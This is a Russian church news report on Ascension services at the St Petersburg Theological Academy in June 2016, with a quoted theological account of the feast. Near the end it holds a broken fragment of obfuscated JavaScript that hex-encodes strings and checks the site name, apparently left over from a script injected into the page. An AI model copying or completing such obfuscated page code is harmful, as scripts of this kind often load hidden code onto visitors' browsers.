Духовная Академия встретила праздник Вознесения Господня (+ВИДЕО)

Духовная Академия встретила праздник Вознесения Господня

Вечером 8 июня 2016 года, накануне праздника Вознесения, в академических храмах было совершено всенощное бдение с литией.

В храме апостола и евангелиста Иоанна Богослова бденную службу возглавил иеромонах Марк (Святогоров), проректор по воспитательной работе. Ему сослужили: иеромонах Геннадий (Поляков); священники Андрей Парафенюк, Александр Кузнецов и Глеб Санюк; иеромонахи Феодосий (Желновачев) и Лука (Пронских); священник Александр Юй; иеромонах Филипп (Балиниу); протодиакон Кирилл Журавлев, диаконы Герман Ранне и Феодор Ибрагимов.

Духовная Академия встретила праздник Вознесения Господня

Богослужение двунадесятого господского праздника отличается торжественностью и динамичностью. В такие дни Типикон предписывает исполнять только праздничные песнопения, перенося службу святому дня.

Духовная Академия встретила праздник Вознесения Господня

Утром 9 июня 2016 года, в день праздника Вознесения, архимандрит Софроний (Смук) совершил Божественную литургию в храме апостола и евангелиста Иоанна Богослова. Пели мужской хор под управлением студента 4 курса бакалавриата Марка Качанкина, смешанный хор под управлением монахини Ксении (Каньшиной) и женский хор под управлением Лидии Масловой.

Духовная Академия встретила праздник Вознесения Господня

После отпуста с проповедью к молящимся обратился иеромонах Феодосий (Желновачев).

В храме Двенадцати апостолов всенощное бдение и праздничную Литургию совершил иеромонах Никодим (Хмыров) в сослужении иеромонахов Варфоломея (Магницкого) и Сергия (Иванова); иеродиакона Владимира (Палибрка) и диакона Иоанна Никитина. Пел малый состав женского хора.

Духовная Академия встретила праздник Вознесения Господня

По окончании Божественной литургии иеромонах Никодим (Хмыров) обратился к собравшимся со словом проповеди.

В храме Успения Пресвятой Богородицы богослужения праздника Вознесения Господня совершил иеромонах Кирилл (Порубаев) в сослужении иеродиакона Алексия (Дурнева). Пел малый состав смешанного хора.

Духовная Академия встретила праздник Вознесения Господня

Иеромонах Кирилл (Порубаев) завершил Литургию проповедью на тему праздничного евангельского чтения.

В завершении Литургии во всех трех храмах духовенство и прихожане пропели славление перед иконой Вознесения Господня.

Вознесение Господне

Праздник Вознесения Господня совершается в сороковой день после Воскресения Господа Иисуса Христа (в день, в который Господь вознесся на небо). Этот день всегда приходится на четверг 6 седмицы после Пасхи. Христос, воскреснув силою Божества, через Вознесение удостоил наше обоженное и одухотворенное человеческое естество величайшей чести и славы – «милостивно вознес» его. Таким образом, «седением с Отцем почтеся наше отпадшее естество».  Через Вознесение падшее человеческое естество возводится Христом, Начальником нашего спасения, от земли, тления и смерти к нескончаемой жизни – на небо. «Низшедшее в дольнейшия страны земли естество, обновив в Себе, Боже, возвел еси днесь превыше всякаго начала и власти; яко бо возлюбив, с Собою спосадил еси; якоже помиловав, соединил еси в Себе; яко соединивый, спострадал еси с ним; яко безтрастен пострадав, и спрославил еси».

Духовная Академия встретила праздник Вознесения Господня

По евангельскому повествованию и богослужебным песнопениям, Господь вознесся на небо и «сел одесную Бога Отца». Апостолы видели вознесение Господа. Спаситель был поднят на облака и затем сокрыт от их очей облаками. Тем самым апостолам дано было понять, что Христос после Своего Вознесения уже не будет видим на земле в телесном Своем виде, как это было до и после Его воскресения, потому что с вознесением Он по Своему человечеству, по Своим телу и душе, стал еще ближе ко Отцу. Господь Иисус Христос воспринял по человечеству то место и получил ту славу, которые Он имел всегда по Божеству, то есть место равное Богу Отцу по достоинству и силе, что и выражается словами: «сел одесную Отца».

По Своем вознесении на небо Христос Спаситель не оставил, не покинул землю Своим присутствием. Он вознесся от нас, Он уже не видим среди верующих в Него телесными очами, но, по словам кондака праздника, пребывает «никакоже отлучаяся» от нас. Он обещает верующим в Него и любящим Его: «Аз есмь с вами, и никтоже на вы». Своим Вознесением Господь стал еще ближе к человечеству, к верующим в Него, ибо Он ныне находится на земле не только Своим Божеством, но и Прославленным Телом в великом таинстве Евхаристии, в котором все верующие приобщаются Его Тела и Крови.

Процитировано из учебного пособия по Литургике Г.И. Шиманского. Источник – православный сайт Азбука.ru

Пресс-служба СПбДА

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "spbda.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Фотогалерея


Опубликовано 09.06.2016 | Просмотров: 406 | Печать
Система Orphus Ошибка в тексте? Выделите её мышкой! И нажмите: Ctrl + Enter